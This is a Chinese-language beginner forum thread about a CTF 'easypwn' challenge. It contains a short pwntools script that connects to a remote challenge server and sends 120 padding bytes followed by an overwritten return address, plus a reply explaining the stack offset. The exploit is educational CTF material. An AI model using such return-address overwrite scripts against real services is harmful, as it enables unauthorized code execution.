[新手入门] 求教一题简单的栈溢出payload分析

[复制链接]
查看129 | 回复2 | 2019-7-30 14:54:05 | 显示全部楼层 |阅读模式
from pwn import *
p=remote('129.211.58.26',10000)
p.recvuntil('Plz input letter exactly!\n')
payload='a'*(120)+p64(0x4006B6)
p.sendline(payload)
p.interactive()
加粗字体部分的 'a'*(120)是什么意思。。
然后 题目放在附件里了 希望有师傅可以教一下orz


easypwn.rar

2.59 KB, 下载次数: 7

回复

使用道具 举报

guo | 2019-8-10 23:07:11 | 显示全部楼层
因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。
回复

使用道具 举报

guo 发表于 2019-8-10 23:07
因为变量V4与返回地址之间相差0x70h,之间要填充120个字符。

请问一下 这个地址相差 怎么看呢
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

2

主题

11

帖子

61

积分

小有名气

Rank: 3Rank: 3

积分
61